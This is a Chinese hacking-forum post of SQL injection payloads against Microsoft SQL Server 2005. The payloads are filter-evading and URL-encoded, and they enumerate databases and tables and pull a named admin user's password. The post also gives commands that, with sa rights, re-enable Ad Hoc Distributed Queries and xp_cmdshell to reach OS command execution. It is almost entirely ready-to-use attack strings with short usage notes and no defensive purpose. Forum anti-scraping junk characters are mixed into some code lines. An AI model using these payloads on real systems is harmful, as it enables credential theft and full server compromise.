找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2005|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
6 W) ~- G1 _) _/ l* e; |
' q, h5 X: h" k' |2 D. `

! s8 A0 D, I. J1 ~1 B[Copy to clipboard]CODE:3 J3 b, Q2 u! o5 V2 j
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--: @# B2 l" E6 d7 L8 Q

' F6 y9 }+ F0 d8 q1 y" E) {0 _$ g爆表语句,somedb部份是所要列的数据库,红色数字1累加
' o, D. S9 e5 D; I$ K
- P' f& S6 O9 h( L  a, K$ J( p# C4 x2 A0 }1 b3 O, @1 J7 d; ?: p% \
[Copy to clipboard]CODE:
$ ~5 v3 f& e; N  B$ i, S+ J/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
( _/ H' H& N* y5 P* ^! n7 |( _. S, r% h6 J
爆字段语句,爆表admin里user='icerover'的密码段
2 P, ~4 `3 l7 g3 Z6 d- i! ~- R  K+ h& h: V, h9 d
5 s1 |5 K' B7 w/ c& h0 k  `' O
[Copy to clipboard]CODE:, f* @; u8 ~/ V. m
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
3 G- ]0 q) |# g& J! X, m; C& U( Q/ d' [" E, H+ ]& n/ {5 Q, ~
mssql2005默认没有开xp_cmdshell的,openrowset也不能用( s" B9 X% O, w& B+ `8 C
如果是sa权限,可以这样来开启
7 Q, x$ o3 _6 f开启openrowset
; e' k( u2 U4 Q3 N7 R' R+ y$ X; w$ l; S+ k# z+ Z6 B

: |% W' {" P( W; e) r: r[Copy to clipboard]CODE:
+ @; a% y3 J: G9 t/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
+ z+ y1 f; k8 ]  H1 x- _; z" }/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
1 \- d1 d) U8 _! W0 \* B8 ?# m6 Z2 d: {# f5 t7 ~
开启xp_cmdshell, |/ ~5 ^) S* v8 e) F" i3 T

: L( s% X0 Y' X+ k3 L' _& J
3 w7 m+ `1 ]4 o! x+ J5 K[Copy to clipboard]CODE:
9 s$ F0 v% x- M) c; PEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
5 x4 O6 c9 K* m" _+ G" oEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--; R6 P8 M+ ~3 E& u- n! K3 k; m4 U

+ l+ C7 n* d( u$ y& c+ L3 c' aok,over~~晚安$ y5 L- Q  \$ c3 h4 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表